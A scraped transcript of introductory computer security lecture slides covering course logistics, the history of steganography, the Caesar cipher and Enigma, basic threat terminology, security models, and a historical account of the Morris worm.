Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at...
Transcript of Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at...
![Page 1: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/1.jpg)
Introduction to Computer SecurityCS3235
Hugh Anderson
CS3235 - Hugh Anderson’s notes.
![Page 2: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/2.jpg)
Contact information
Room S15 #06-12Telephone 6874-6903E-mail [email protected]
...and Spinellis...
CS3235 - Hugh Anderson’s notes. Page number: 1
![Page 3: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/3.jpg)
People
Dr Robert Deng, Institute for Infocomm Research
http://www.i2r.a-star.edu.sg/icsd/staff/Robert/
CS3235 - Hugh Anderson’s notes. Page number: 2
![Page 4: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/4.jpg)
Official SOC description
With the widespread use of computers and Internet as well as electronic com-merce, computer security becomes more and more important. The objectiveof this module is to give students basic knowledge of computer security. Thismodule covers the following topics: threats to computer systems, network se-curity fundamentals, security in a layered protocol architecture, authenticationin computer systems, access control, intrusion detection, security architectureand frameworks, lower layers security protocols, upper layer security proto-cols, electronic mail and EDI security, directory systems security, Unix systemssecurity, security evaluation criteria.
CS3235 - Hugh Anderson’s notes. Page number: 3
![Page 5: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/5.jpg)
Assessment
Assessment Weighting Grade
Assignments 35%
Tutorials 5%
Mid-term Closed book 10%
Final Exam Open Book 50%
Total marks 100%
CS3235 - Hugh Anderson’s notes. Page number: 4
![Page 6: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/6.jpg)
Resources
Computer Security: Art and Science, Matt Bishop
The notes are expanded versions of the overheads
Directed readings - all available on the Internet.
IVLE at http://ivle.nus.edu.sg/
Web site at http://www.comp.nus.edu.sg/˜cs3235
CS3235 - Hugh Anderson’s notes. Page number: 5
![Page 7: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/7.jpg)
Comparison
Different focus
More introductory and practical material
Less material duplicated
CS3235 - Hugh Anderson’s notes. Page number: 6
![Page 8: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/8.jpg)
Topics - general
History and background,
Preliminaries
Encoding and decoding
Protocols used for security.
CS3235 - Hugh Anderson’s notes. Page number: 7
![Page 9: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/9.jpg)
Topics - detail
• Mathematical, physical, legal (2 lectures)
• Security models (1 lecture)
• Secrecy (1 lecture)
• Insecurity (2 lectures)
• Safety/control hardware/software (2 lectures)
• Assurance (1 lecture)
• Protocols (1 lecture)
• + Case studies
CS3235 - Hugh Anderson’s notes. Page number: 8
![Page 10: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/10.jpg)
Tutorials
Start in 3rd week
More details next week
CS3235 - Hugh Anderson’s notes. Page number: 9
![Page 11: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/11.jpg)
My expectation...
Attend classes and tutorials
Ask if you don’t know
Read notes, book, and the readings...
Get interested in the subject
CS3235 - Hugh Anderson’s notes. Page number: 10
![Page 12: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/12.jpg)
Chapter 1
Lecture 1 - Introduction
CS3235 - Hugh Anderson’s notes. Page number: 11
![Page 13: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/13.jpg)
Jump-about-introduction
...sorry sorry...
CS3235 - Hugh Anderson’s notes. Page number: 12
![Page 14: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/14.jpg)
The History of Herodotus
For Histiæus, when he was anxious to give Aristagoras orders torevolt, could find but one safe way, as the roads were guarded,of making his wishes known; which was by taking the trustiestof his slaves, shaving all the hair from off his head, and thenpricking letters upon the skin, and waiting till the hair grew again.Thus accordingly he did; and as soon as ever the hair was grown,he despatched the man to Miletus, giving him no other messagethan this- "When thou art come to Miletus, bid Aristagoras shavethy head, and look thereon." Now the marks on the head, as Ihave already mentioned, were a command to revolt...
CS3235 - Hugh Anderson’s notes. Page number: 13
![Page 15: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/15.jpg)
The History of Herodotus
Histiæus ensured confidentiality
Used again by Germany in the 1914-1918 war
This is now called steganography
CS3235 - Hugh Anderson’s notes. Page number: 14
![Page 16: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/16.jpg)
More history
Cæsar encoded messages - cryptography
Agreed protocols to ensure correct conduct of a war
Examples taken from the world of warfare
CS3235 - Hugh Anderson’s notes. Page number: 15
![Page 17: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/17.jpg)
Aspects to “computer security”
Security problems in society reoccur in computers
Confidentiality = locks/encoding.
Integrity = handshakes/signatures
Computer versions much faster.
In this course, security includes wider aspects.
CS3235 - Hugh Anderson’s notes. Page number: 16
![Page 18: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/18.jpg)
Terms: Services
Three aspects of security services:
• confidentiality : concealing information - resources;
• integrity : trustworthiness of data - resources;
• availability : preventing denial-of-service.
CS3235 - Hugh Anderson’s notes. Page number: 17
![Page 19: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/19.jpg)
Terms: Threats
Alice Bob
Ted
Snooping
CS3235 - Hugh Anderson’s notes. Page number: 18
![Page 20: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/20.jpg)
Terms: Threats
Alice Bob
Ted
Man in the middle
CS3235 - Hugh Anderson’s notes. Page number: 19
![Page 21: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/21.jpg)
Terms: Threats
Alice Bob
Ted
Denial of service
CS3235 - Hugh Anderson’s notes. Page number: 20
![Page 22: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/22.jpg)
Terms: Threats
Alice Bob
Ted
Spoofing
CS3235 - Hugh Anderson’s notes. Page number: 21
![Page 23: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/23.jpg)
Terms: Threats
• disclosure : unauthorized access (snooping);
• deception : accept false data (man-in-the-middle);
• disruption : prevent correct operation (denial-of-service);
• usurpation : unauthorized control (spoofing).
CS3235 - Hugh Anderson’s notes. Page number: 22
![Page 24: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/24.jpg)
Terms: Policy and mechanism
We differentiate between a security policy and a securitymechanism:
• policy : what is allowed/disallowed;
• mechanism : ways of enforcing a policy
CS3235 - Hugh Anderson’s notes. Page number: 23
![Page 25: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/25.jpg)
NUS IT policy
For example, at NUS, we have an IT policy which includesa range of clauses regarding security concerns, such as:
4.2 Undermining System Integrity
Users must not undermine the security of the IT Re-sources, for example, by cracking passwords or tomodify or attempt to modify the files of other Usersor software components of the IT Resources.
CS3235 - Hugh Anderson’s notes. Page number: 24
![Page 26: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/26.jpg)
NUS mechanisms
6.3 Use Of Security Scanning Systems
Users consent to the University’s use of scanning pro-grams for security purposes at system level for com-puters and systems that are connected to the Univer-sity’s network. This is to ensure that any computersor systems attached to the network will not become alaunching pad for security attack and jeopardise the ITResources. System level scanning includes scanningfor security vulnerabilities and virus detection on emailattachments. Users’ files and data are excluded fromthe scanning.
CS3235 - Hugh Anderson’s notes. Page number: 25
![Page 27: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/27.jpg)
Topic: Preliminaries
Review some mathematical concepts. XOR, modulo,primes
The textbook, and my notes should be enough.
Physical laws and procedures. Information and Entropy
CS3235 - Hugh Anderson’s notes. Page number: 26
![Page 28: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/28.jpg)
Topic: Security models
These models provide formal ways of looking at computersecurity in an abstract manner.
1. Define a model, and
2. prove it secure
3. Ensure system complies with model
CS3235 - Hugh Anderson’s notes. Page number: 27
![Page 29: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/29.jpg)
Topic: Security models
• The Bell-LaPadula model (no read-up, no write-down)provides a military viewpoint to assure confidentiality ser-vices.
• The Biba and Clark-Wilson models attempt to model thetrustworthiness of data and programs, providing assur-ance for integrity services.
... Read ahead ...
CS3235 - Hugh Anderson’s notes. Page number: 28
![Page 30: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/30.jpg)
Topic: Security models
Determine properties of the model, and
Verify that implementations are valid.
Basis of trusted operating systems
Modelling for availability is tricky
CS3235 - Hugh Anderson’s notes. Page number: 29
![Page 31: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/31.jpg)
Topic: Secrecy
Commerce relies on secure transfer of information, and
Often just want things to be secret
Distance between you and an attacker is shrinking
Criminals have an access point into your living room
CS3235 - Hugh Anderson’s notes. Page number: 30
![Page 32: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/32.jpg)
2000 years ago...
Replace each Roman letter in a message, with another Ro-man letter, obtained by rotating the alphabet some numberof characters:
I C L A V D I V S
A B C D E F G H I K L M N O P Q R S T V X Y Z
V X Y Z A B C D E F G H I K L M N O P Q R S T
E Y G V Q Z E Q O
We can specify a Cæsar cipher by just noting the number ofcharacters that the alphabet is rotated.
CS3235 - Hugh Anderson’s notes. Page number: 31
![Page 33: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/33.jpg)
60 years ago...
CS3235 - Hugh Anderson’s notes. Page number: 32
![Page 34: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/34.jpg)
60 years ago
CS3235 - Hugh Anderson’s notes. Page number: 33
![Page 35: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/35.jpg)
Enigma machines
Commercial device
Used by the German military
Belief that could not be decoded.
CS3235 - Hugh Anderson’s notes. Page number: 34
![Page 36: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/36.jpg)
Enigma machines
CS3235 - Hugh Anderson’s notes. Page number: 35
![Page 37: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/37.jpg)
Enigma machines
CS3235 - Hugh Anderson’s notes. Page number: 36
![Page 38: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/38.jpg)
Hacking Enigma
Americans captured a German submarine?
Alan Turing did it all?
Hard workers at Bletchley Park?
My dad?
CS3235 - Hugh Anderson’s notes. Page number: 37
![Page 39: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/39.jpg)
Hacking Enigma
1928: Poles intercepted a machine
1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski.
Decoded some messages
German army using an extra level of encoding
French spies uncovered the extra encoding
CS3235 - Hugh Anderson’s notes. Page number: 38
![Page 40: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/40.jpg)
Hacking Enigma
1933-1939: the Polish Ciphers Office was able to decodemessages, although slowly.
July 1939: Poland gave Enigma copies to English
Bletchley Park
May 1941: English captured the U-110 submarine, com-plete with a genuine Enigma machine, and code books.
CS3235 - Hugh Anderson’s notes. Page number: 39
![Page 41: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/41.jpg)
Hacking Enigma
1941-45: English could decode most German militarytransmissions.
1941-45: developed a hardware system
Precursor to modern-day computers
CS3235 - Hugh Anderson’s notes. Page number: 40
![Page 42: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/42.jpg)
Today...sssshhhh
Secure encrypted communications between
two untrusted hosts over an insecure network.
Other connections can also be forwarded
Users must prove their identity to the remote machine
CS3235 - Hugh Anderson’s notes. Page number: 41
![Page 43: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/43.jpg)
Secure-shell
Based on public-key cryptography:
Encryption and decryption use separate keys not possible to derive one from other RSA is one such system.
Encodings believed to be difficult to decode, and
protocols of message exchange that are believed to besecure.
CS3235 - Hugh Anderson’s notes. Page number: 42
![Page 44: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/44.jpg)
Topic: Insecurity
Systems dangerously easy to subvert
Adversary gains control over your system
You sign a contract, and other party doesn’t.
Investigate hacking and reducing risk
CS3235 - Hugh Anderson’s notes. Page number: 43
![Page 45: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/45.jpg)
Topic: Insecurity
A locked air-conditioned room with file server:
• The lock can be picked, or the door kicked in.
• The console of the server computer may be passwordprotected, but
– it may be rebooted with a different disk.
CS3235 - Hugh Anderson’s notes. Page number: 44
![Page 46: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/46.jpg)
Topic: Insecurity
• The reboot process may be (BIOS) password protected,but
– the case of the computer may be opened and the diskremoved.
• And so on...
CS3235 - Hugh Anderson’s notes. Page number: 45
![Page 47: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/47.jpg)
Topic: Insecurity
Tempest - computer screen monitoring
Paper
http://jya.com/emr.pdf
Overcoming
http://www.cs.rice.edu/˜dwallach/courses/comp527 s2000/ih98-tempest.pdf
Monitor screens at a distance of 1km for $15.
CS3235 - Hugh Anderson’s notes. Page number: 46
![Page 48: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/48.jpg)
Topic: Insecurity
Kick in doors without even using your feet
CS3235 - Hugh Anderson’s notes. Page number: 47
![Page 49: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/49.jpg)
Topic: Insecurity
Non-repudiation for e-commerce:
• the buyer cannot order an item and then deny the ordertook place;
• the seller cannot accept money or an order and then laterdeny that this took place.
CS3235 - Hugh Anderson’s notes. Page number: 48
![Page 50: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/50.jpg)
Topic: Insecurity
Intrusive hacking is common on the Internet.
Farms of subservient machines:
At first, it looked as if some students at the Flint HillSchool, a prep academy in Oakton, Va., had found alucrative alternative to an after-school job...
CS3235 - Hugh Anderson’s notes. Page number: 49
![Page 51: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/51.jpg)
Topic: Insecurity
Virusses: boot-sector hide their code in the boot sectorof a disk.
the stoned virus for DOS, written by a student fromNew Zealand!
A virus contains code that replicates, attaching itself toa program, boot sector or document. Some viruses dodamage as well.
CS3235 - Hugh Anderson’s notes. Page number: 50
![Page 52: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/52.jpg)
Topic: Insecurity
Worm is a program that makes copies of itself, transferringitself around. The Morris worm in 1988:
On the evening of 2 November 1988, someone in-fected the Internet with a worm program. That pro-gram exploited flaws in utility programs in systemsbased on BSD-derived versions of UNIX. The flaws al-lowed the program to break into those machines andcopy itself, thus infecting those systems.
CS3235 - Hugh Anderson’s notes. Page number: 51
![Page 53: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/53.jpg)
The Morris Worm
This program eventually spread to thousands of ma-chines, and disrupted normal activities and Internetconnectivity for many days.
ftp://ftp.cs.purdue.edu/pub/reports/TR823.PS.Z
The author of the worm, Robert Morris, was convicted andfined $10,050 in 1990, and is currently a professor in theParallel and Distributed Operating Systems group at MIT,lecturing in distributed systems areas.
CS3235 - Hugh Anderson’s notes. Page number: 52
![Page 54: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/54.jpg)
Topic: Protocols
Some aspects of security are determined by the way inwhich we do things (the protocol), rather than what is ac-tually done.
CS3235 - Hugh Anderson’s notes. Page number: 53
![Page 55: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/55.jpg)
Topic: Protocols
CS3235 - Hugh Anderson’s notes. Page number: 54
![Page 56: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/56.jpg)
Summary of topics
In this section, we introduced the following topics:
• An introduction to computer security
• Some definitions
CS3235 - Hugh Anderson’s notes. Page number: 55
![Page 57: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/57.jpg)
Further study
• Textbook Chapter 1
• Monitoring computer screenshttp://jya.com/emr.pdf
• Overcoming Tempest monitoringhttp://www.cs.rice.edu/˜dwallach/courses/comp527 s2000/ih98-tempest.pdf
• The Morris wormftp://ftp.cs.purdue.edu/pub/reports/TR823.PS.Z
• Military mathematical modelling of securityhttp://80-ieeexplore.ieee.org.libproxy1.nus.edu.sg/xpl/tocresult.jsp?isNumber=13172
CS3235 - Hugh Anderson’s notes. Page number: 56
![Page 58: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/58.jpg)
Done!
CS3235 - Hugh Anderson’s notes. Page number: 57
![Page 59: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/59.jpg)
Chapter 2
Lecture 2 - Preliminaries
CS3235 - Hugh Anderson’s notes. Page number: 58
